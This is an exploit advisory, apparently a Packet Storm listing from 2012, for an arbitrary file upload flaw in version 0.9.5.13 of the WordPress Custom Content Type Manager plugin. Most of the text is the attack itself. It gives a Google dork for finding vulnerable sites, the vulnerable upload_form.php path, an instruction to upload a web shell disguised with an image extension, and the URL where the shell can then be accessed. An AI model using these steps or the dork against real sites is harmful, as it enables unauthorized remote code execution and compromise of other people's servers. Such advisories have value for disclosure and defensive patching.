WordPress Custom Content Type Manager 0.9.5.13-pl Shell Upload

2012-06-12T00:00:00
ID PACKETSTORM:113520
Type packetstorm
Reporter Adrien Thierry
Modified 2012-06-12T00:00:00

Description

                                        
                                            `###########################################################  
#  
# Exploit Title: Wordpress Custom Content Type Manager 0.9.5.13-pl Arbitrary File Upload  
# Google Dork: inurl:wp-content/plugins/custom-content-type-manager/  
# Date: 11/06/2012  
# Exploit Author: Adrien Thierry  
# Vendor Homepage: http://www.fireproofsocks.com/  
# Software Link: http://downloads.wordpress.org/plugin/custom-content-type-manager.0.9.5.13.zip  
# Version: 0.9.5.13  
#  
###########################################################  
  
Vuln page : http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php  
  
exploit :  
  
http://mysite.com/wp-content/plugins/custom-content-type-manager/upload_form.php  
  
-> upload your shell with image ext (jpg|png|gif)  
  
shell access : http://mysite.com/wp-content/uploads/[YYYY]/[MM]/shell.php.jpg  
  
#####################################################################  
`